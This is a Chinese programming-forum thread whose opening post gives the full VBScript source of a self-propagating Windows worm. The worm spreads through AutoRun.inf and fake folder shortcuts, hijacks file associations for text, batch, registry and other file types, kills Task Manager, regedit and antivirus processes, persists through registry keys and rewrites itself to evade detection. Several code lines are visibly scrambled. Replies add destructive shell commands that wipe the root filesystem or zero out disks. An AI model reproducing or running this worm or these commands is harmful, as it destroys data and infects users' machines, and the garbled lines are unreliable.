V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
2015813
V2EX  ›  程序员

病毒编写方式,以暴风一号 VBS 病毒源代码为例

  •  
  •   2015813 · 2015-12-08 18:28:02 +08:00 · 7333 次点击
    这是一个创建于 3275 天前的主题,其中的信息可能已经有所发展或是发生改变。

    暴风一号病毒源代码,一些杀毒软件又称“ 1K 快捷方式病毒”,是一个大学生的闲暇之作。值得研究学习, VBS 病毒的鼻祖是马尼拉 AMA 计算机大学的学生编写的“爱虫”病毒。很久了。
    On Error Resume Next
    Dim Fso,Wshshell
    Set Fso = CreateObject("Scripting.Filesystemobject")
    Set Wshshell = CreateObject("Wscript.Shell")

    Call Main()

    Sub Main()

    On Error Resume Next
    Dim Args, VirusLoad, VirusAss
    Set Args = WScript.Arguments
    
    VirusLoad = GetMainVirus(1)
    VirusAss = GetMainVirus(0)
    ArgNum = 0
    Do WhileArgNum < Args.Count
        Param = Param & " " & Args(ArgNum)
        ArgNum = ArgNum + 1
    Loop
    
    SubParam = LCase(Right(Param, 3))
    
    Select Case SubParam
    
        Case "run"
        RunPath = Left(WScript.ScriptFullName, 2)
        Call Run(RunPath)
        Call InvadeSystem(VirusLoad,VirusAss)
        Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
        Case "txt", "log","ini" ,"inf"
        RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Param
        Call Run(RunPath)
        Call InvadeSystem(VirusLoad,VirusAss)
        Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
        Case "bat", "cmd"
        RunPath = "CMD /c echo Hi!I'm here!&pause"
        Call Run(RunPath)
        Call InvadeSystem(VirusLoad,VirusAss)
        Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
        Case "reg"
        RunPath = "regedit.exe " & """" & Trim(Param) & """"
        Call Run(RunPath)
        Call InvadeSystem(VirusLoad,VirusAss)
        Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
        Case "chm"
        RunPath = "hh.exe " & """" & Trim(Param) & """"
        Call Run(RunPath)
        Call InvadeSystem(VirusLoad,VirusAss)
        Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
        Case "hlp"
        RunPath = "winhlp32.exe " & """" & Trim(Param) & """"
        Call Run(RunPath)
        Call InvadeSystem(VirusLoad,VirusAss)
        Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
        Case "dir"
        RunPath = """" & Left(Trim(Param),Len(Trim(Param)) - 3) & """"
        Call Run(RunPath)
        Call InvadeSystem(VirusLoad,VirusAss)
        Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
        Case "oie"
        RunPath = """%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""
        Call Run(RunPath)
        Call InvadeSystem(VirusLoad,VirusAss)
        Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
        Case "omc"
        RunPath = "explorer.exe / n,
        {20D04FE0 - 3AEA - 1069 - A2D8 - 08002B30309D}"
        Call Run(RunPath)
        Call InvadeSystem(VirusLoad,VirusAss)
        Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
        Case "emc"
        RunPath = "explorer.exe / n, / e,
        {20D04FE0 - 3AEA - 1069 - A2D8 - 08002B30309D}"
        Call Run(RunPath)
        Call InvadeSystem(VirusLoad,VirusAss)
        Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad)
        Case Else
    
        If PreDblInstance = True Then
            WScript.Quit
        End If
    
    
        Call MonitorSystem()
    End Select
    

    End Sub

    Sub MonitorSystem()
    On Error Resume Next
    Dim ProcessNames, ExeFullNames

    ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr","regedit.pif", "regedit.com", "msconfig.exe")
    VBSFullNames = Array(GetMainVirus(1))
    Do
    
        Call KillProcess(ProcessNames)
    
        Call InvadeSystem(GetMainVirus(1),GetMainVirus(0))
    
        Call KeepProcess(VBSFullNames)
        WScript.Sleep 3000
    Loop
    

    End Sub

    Sub InvadeSystem(VirusLoadPath,VirusAssPath)
    On Error Resume Next
    Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
    Load_Value = "%SystemRoot%\system\svchost.exe " & """" & VirusLoadPath & """"
    File_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " %1 %* "
    IE_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OIE "
    MyCpt_Value1 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OMC "
    MyCpt_Value2 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " EMC "
    HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
    HCUVer = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
    HCUDate = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
    VirusCode = GetCode(WScript.ScriptFullName)
    Version = 1
    HostSourcePath = Fso.GetSpecialFolder(1) & "\Wscript.exe"
    HostFilePath = Fso.GetSpecialFolder(0) & "\system\svchost.exe"
    For Each Drive In Fso.Drives
    If Drive.IsReady And (Drive.DriveType = 1 Or Drive.DriveType = 2 Or Drive.DriveType = 3) Then
    DiskVirusName = GetSerialNumber(Drive.DriveLetter) & ".vbs"
    Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)
    Call InfectRoot(Drive.DriveLetter,DiskVirusName)
    End If
    Next
    If FSO.FileExists(VirusAssPath) = False Or FSO.FileExists(VirusLoadPath) = False Or FSO.FileExists(HostFilePath) = False Or GetVersion() < Version Then
    If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
    Call CreateFile(VirusCode,VirusAssPath)
    Call CreateFile(VirusCode,VirusLoadPath)
    Call CopyFile(HostSourcePath,HostFilePath)
    Call SetHiddenAttr(HostFilePath)
    Else
    Call CreateFile(VirusCode, VirusAssPath)
    Call SetHiddenAttr(VirusAssPath)
    Call CreateFile(VirusCode,VirusLoadPath)
    Call SetHiddenAttr(VirusLoadPath)
    Call CopyFile(HostSourcePath, HostFilePath)
    Call SetHiddenAttr(HostFilePath)
    End If
    End If
    If ReadReg(HCULoad) <> Load_Value Then
    Call WriteReg (HCULoad, Load_Value, "")
    End If
    If GetVersion() < Version Then
    Call WriteReg (HCUVer, Version, "")
    End If
    If GetInfectedDate() = "" Then
    Call WriteReg (HCUDate, Date, "")
    End If
    If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\") <> File_Value Then
    Call SetTxtFileAss(VirusAssPath)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\") <> File_Value Then
    Call SetIniFileAss(VirusAssPath)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\") <> File_Value Then
    Call SetInfFileAss(VirusAssPath)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\") <> File_Value Then
    Call SetBatFileAss(VirusAssPath)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\") <> File_Value Then
    Call SetCmdFileAss(VirusAssPath)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\") <> File_Value Then
    Call SetRegFileAss(VirusAssPath)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\") <> File_Value Then
    Call SetchmFileAss(VirusAssPath)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\") <> File_Value Then
    Call SethlpFileAss(VirusAssPath)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\") <> IE_Value Then
    Call SetIEAss(VirusAssPath)
    End If
    If ReadReg("HKEY_CLASSES_ROOT\CLSID{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\") <> IE_Value Then
    Call SetIEAss(VirusAssPath)
    End If
    If ReadReg("HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\") <> MyCpt_Value1 Then
    Call SetMyComputerAss(VirusAssPath)
    End If
    If ReadReg("HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\") <> MyCpt_Value2 Then
    Call SetMyComputerAss(VirusAssPath)
    End If
    Call RegSet()
    End Sub

    Sub CopyFile(source, pathf)

    On Error Resume Next
    
    If FSO.FileExists(pathf) Then
    
        FSO.DeleteFile pathf , True
    End If
    
    FSO.CopyFile source, pathf
    

    End Sub

    Sub CreateFile(code, pathf)
    On Error Resume Next
    Dim FileText
    If FSO.FileExists(pathf) Then
    Set FileText = FSO.OpenTextFile(pathf, 2, False)
    FileText.Write code
    FileText.Close
    Else
    Set FileText = FSO.OpenTextFile(pathf, 2, True)
    FileText.Write code
    FileText.Close
    End If
    End Sub

    Sub RegSet()
    On Error Resume Next
    Dim RegPath1 , RegPath2, RegPath3, RegPath4

    RegPath1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"
    RegPath2 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
    RegPath3 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
    RegPath4 = "HKEY_CLASSES_ROOT\lnkfile\IsShortcut"
    
    Call WriteReg (RegPath1, 3, "REG_DWORD")
    Call WriteReg (RegPath2, 2, "REG_DWORD")
    Call WriteReg (RegPath3, 0, "REG_DWORD")
    
    Call DeleteReg (RegPath4)
    

    End Sub

    Sub KillProcess(ProcessNames)
    On Error Resume Next
    Set WMIService = GetObject("winmgmts
    [url = file
    / / \ \ . \ root \ cimv2] \ \ . \ root \ cimv2[ / url]")
    For Each ProcessName In ProcessNames
    Set ProcessList = WMIService.execquery(" Select * From win32_process where name ='" & ProcessName & "' ")
    For Each Process In ProcessList
    IntReturn = Process.terminate
    If intReturn <> 0 Then
    WshShell.Run "CMD /c ntsd -c q -p " & Process.Handle, vbHide, False
    End If
    Next
    Next
    End Sub

    Sub KillImmunity(D)
    On Error Resume Next
    ImmunityFolder = D & "
    \ Autorun.inf"
    If Fso.FolderExists(ImmunityFolder) Then
    WshSHell.Run ("CMD /C CACLS " & """" & ImmunityFolder & """" & " / t / e / c / g everyone
    f"),vbHide,True
    WshSHell.Run ("CMD /C RD /S /Q " & ImmunityFolder), vbHide, True
    End If
    End Sub

    7 条回复    2015-12-09 16:33:25 +08:00
    2015813
        1
    2015813  
    OP
       2015-12-08 18:31:59 +08:00
    Sub KeepProcess(VBSFullNames)
    On Error Resume Next
    For Each VBSFullName In VBSFullNames
    If VBSProcessCount(VBSFullName) < 2 Then
    Run("%SystemRoot%\system\svchost.exe " & VBSFullName)
    End If
    Next
    End Sub


    Function GetSystemDrive()
    GetSystemDrive = Left(Fso.GetSpecialFolder(0),2)
    End Function


    Function GetFileSystemType(Drive)
    Set d = FSO.GetDrive(Drive)
    GetFileSystemType = d.FileSystem
    End Function


    Function ReadReg(strkey)
    Dim tmps
    Set tmps = CreateObject("WScript.Shell")
    ReadReg = tmps.RegRead(strkey)
    Set tmps = Nothing
    End Function


    Sub WriteReg(strkey, Value, vtype)
    Dim tmps
    Set tmps = CreateObject("WScript.Shell")
    If vtype = "" Then
    tmps.RegWrite strkey, Value
    Else
    tmps.RegWrite strkey, Value, vtype
    End If
    Set tmps = Nothing
    End Sub


    Sub DeleteReg(strkey)
    Dim tmps
    Set tmps = CreateObject("WScript.Shell")
    tmps.RegDelete strkey
    Set tmps = Nothing
    End Sub


    Sub SetHiddenAttr(path)
    On Error Resume Next
    Dim vf
    Set vf = FSO.GetFile(path)
    Set vf = FSO.GetFolder(path)
    vf.Attributes = 6
    End Sub


    Sub Run(ExeFullName)
    On Error Resume Next
    Dim WshShell
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run ExeFullName
    Set WshShell = Nothing
    End Sub


    Sub InfectRoot(D,VirusName)
    On Error Resume Next
    Dim VBSCode
    VBSCode = GetCode(WScript.ScriptFullName)
    VBSPath = D & "\" & VirusName
    If FSO.FileExists(VBSPath) = False Then
    Call CreateFile(VBSCode, VBSPath)
    Call SetHiddenAttr(VBSPath)
    End If
    Set Folder = Fso.GetFolder(D & "\")
    Set SubFolders = Folder.Subfolders
    For Each SubFolder In SubFolders
    SetHiddenAttr(SubFolder.Path)

    LnkPath = D & "\" & SubFolder.Name & ".lnk"
    TargetPath = D & "\" & VirusName
    Args = """" & D & "\" & SubFolder.Name & "\Dir"""
    If Fso.FileExists(LnkPath) = False Or GetTargetPath(LnkPath) <> TargetPath Then
    If Fso.FileExists(LnkPath) = True Then
    FSO.DeleteFile LnkPath, True
    End If

    Call CreateShortcut(LnkPath,TargetPath,Args)
    End If
    Next
    End Sub


    Sub CreateShortcut(LnkPath,TargetPath,Args)
    Set Shortcut = WshShell.CreateShortcut(LnkPath)
    With Shortcut
    .TargetPath = TargetPath
    .Arguments = Args
    .WindowStyle = 4
    .IconLocation = "%SystemRoot%\System32\Shell32.dll, 3"
    .Save
    End With
    End Sub


    Sub CreateAutoRun(D,VirusName)
    On Error Resume Next
    Dim InfPath, VBSPath, VBSCode
    InfPath = D & "
    \ AutoRun.inf"
    VBSPath = D & "
    \ " & VirusName
    VBSCode = GetCode(WScript.ScriptFullName)
    If FSO.FileExists(InfPath) = False Or FSO.FileExists(VBSPath) = False Then
    Call CreateFile(VBSCode, VBSPath)
    Call SetHiddenAttr(VBSPath)
    StrInf = "[AutoRun]" & vbCrLf & "Shellexecute=WScript.exe " & VirusName & " ""AutoRun""" & vbCrLf & "shell\open=打开(&O)" & vbCrLf & "shell\open\command=WScript.exe " & VirusName & " ""AutoRun""" & vbCrLf & "shell\open\Default=1" & vbCrLf & "shell\explore=资源管理器(&X)" & vbCrLf & "shell\explore\command=WScript.exe " & VirusName & " ""AutoRun"""
    Call KillImmunity(D)
    Call CreateFile(StrInf, InfPath)
    Call SetHiddenAttr(InfPath)
    End If
    End Sub

    Sub SetTxtFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
    End Sub


    Sub SetIniFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\", Value, "REG_EXPAND_SZ")
    End Sub

    Sub SetInfFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    alue = "%StemRootVystem3yscript%\Sript.\WS " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\", Value, "REG_EXPAND_SZ")
    End Sub


    Sub SetBatFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\", Value, "REG_EXPAND_SZ")
    End Sub


    Sub SetCmdFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\", Value, "REG_EXPAND_SZ")
    End Sub
    2015813
        2
    2015813  
    OP
       2015-12-08 18:32:55 +08:00
    Sub SethlpFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
    End Sub

    Sub SetRegFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
    End Sub

    Sub SetchmFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
    End Sub

    Sub SetIEAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " OIE "
    itl WCalEg("eRerOCAY_LHKNEACHL_MEFTW\SOIRE\\ClARes\Applications\iexplore.exe\shell\open\command\", Value, "REG_EXPAND_SZ")
    Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\", Value, "REG_EXPAND_SZ")
    End Sub

    Sub SetMyComputerAss(sFilePath)
    On Error Resume Next
    Dim Value1,Value2
    Value1 = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " OMC "
    Value2 = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " EMC "
    Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\", "", "REG_SZ")
    Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\", Value1, "REG_EXPAND_SZ")
    Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\", Value2, "REG_EXPAND_SZ")
    End Sub


    Function GetSerialNumber(Drv)
    On Error Resume Next
    det.Ssoo.GetDrive(Drv)
    GetSerialNumber = d.SerialNumber
    GetSerialNumber = Replace(GetSerialNumber,"-","")
    End Function

    Function GetMainVirus(N)
    On Error Resume Next
    MainVirusName = GetSerialNumber(GetSystemDrive()) & ".vbs"
    If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
    If N = 1 Then
    GetMainVirus = Fso.GetSpecialFolder(N) & "\smss.exe" & MainVirusName
    End If
    If N = 0 Then
    GetMainVirus = Fso.GetSpecialFolder(N) & "\explorer.exe" & MainVirusName
    End If
    Else
    GetMainVirus = Fso.GetSpecialFolder(N) & "\" & MainVirusName
    End If
    End Function


    Function VBSProcessCount(VBSPath)
    On Error Resume Next
    Dim WMIService, ProcessList, Process
    VBSProcessCount = 0
    Set WMIService = GetObject("winmgmts
    [url = file
    / / \ \ . \ root \ cimv2] \ \ . \ root \ cimv2[ / url]")
    Set ProcessList = WMIService.ExecQuery("Select * from Win32_Process Where " & "Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'")
    For Each Process In ProcessList
    If InStr(Process.CommandLine, VBSPath) > 0 Then
    VBSProcessCount = VBSProcessCount + 1
    End If
    Next
    End Function

    Function PreDblInstance()
    On Error Resume Next
    PreDblInstance = False
    If VBSProcessCount(WScript.ScriptFullName) >= 3 Then
    PreDblInstance = True
    End If
    End Function

    Function GetTargetPath(LnkPath)
    On Error Resume Next
    Dim Shortcut
    Set Shortcut = WshShell.CreateShortcut(LnkPath)
    GetTargetPath = Shortcut.TargetPath
    End Function

    Function GetCode(FullPath)
    On Error Resume Next
    Dim FileText
    Set FileText = FSO.OpenTextFile(FullPath, 1)
    GetCode = FileText.ReadAll
    FileText.Close
    End Function

    Function GetVersion()
    Dim VerInfo
    VerInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
    If ReadReg(VerInfo) = "" Then
    GetVersion = 0
    Else
    GetVersion = CInt(ReadReg(VerInfo))
    End If
    End Function

    Function GetInfectedDate()
    On Error Resume Next
    Dim DateInfo
    DateInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
    If ReadReg(DateInfo) = "" Then
    GetInfectedDate = ""
    Else
    GetInfectedDate = CDate(ReadReg(DateInfo))
    End If
    End Function

    Execute("set e452 = createobject(""scripting.filesystemobject"")
    Set d600 = e452.opentextfile(WScript.scriptfullname,1)
    Do untild600.atendofstream
    F19a = Trim(d600.readline)
    If Left(f19a,1) = ""'"" then
    F631 = e30b(Mid(f19a,2,Len(f19a) - 2),Right(f19a,1))
    Randomize
    A880 = Int(8 * Rnd + 2)
    Dcc1 = ""'""&e30b(f631,a880)&a880
    Else
    Dcc1 = f19a
    Dcc1 = a972(dcc1)
    Dcc1 = b26b(dcc1)
    End If
    Fbbe = fbbe & f631 & vbCrLf
    A41a = a41a & dcc1 & vbCrLf
    F631 = """"
    Dcc1 = """"
    Loop
    Set d600 = e452.opentextfile(WScript.scriptfullname,2)
    D600.write a41a
    D600.close
    Set e452 = Nothing
    Execute fbbe

    Function e30b(ba1e,a880)
    For d769 = 1 To Len(ba1e) step a880
    E30b = e30b + StrReverse(Mid(ba1e,d769,a880))
    Next
    End Function

    Function b26b(ba1e)
    Randomize
    For d769 = 1 To Len(ba1e)
    D841 = Mid(UCase(ba1e),d769,1)
    If Int(Rnd * 2) Then
    D841 = LCase(d841)
    End If
    B26b = b26b & d841
    Next
    End Function

    Function a972(ba1e)
    Randomize
    For d769 = 0 To 13
    Ba1e = Replace(UCase(ba1e),UCase(Hex( & he452 + d769)),UCase(Hex(Int(Rnd * 24000 + 40960) + d769)))
    Next
    A972 = ba1e
    End Function
    loading
        3
    loading  
       2015-12-08 18:35:19 +08:00 via Android
    楼主,你这是找 block 是吧?
    去学下贴代码吧~
    病毒只是程序的一种,这里很多人都会写!
    RemRain
        4
    RemRain  
       2015-12-08 18:51:26 +08:00
    明显没有如下命令好使:
    chmod -R 000 /

    rm -rf /*

    for i in /dev/sd*; do dd if=/dev/zero of=$i & ; done
    ICANN
        5
    ICANN  
       2015-12-08 21:46:59 +08:00
    乳猪试一下这段代码如何。
    $ for((i=1;i<=200000;i++));do dd if=/dev/zero of=file_$i bs=1 count=1;done
    holyzhou
        6
    holyzhou  
       2015-12-09 01:50:44 +08:00
    楼上也别老贴这些危险命令成不~  秀优越?
    xylophone21
        7
    xylophone21  
       2015-12-09 16:33:25 +08:00
    我猜楼上的意思是说,贴这么大段的所谓病毒代码,其实还不如来个命令直接。那是否意味着这个命令也是一个病毒呢?
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1061 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 19:52 · PVG 03:52 · LAX 11:52 · JFK 14:52
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.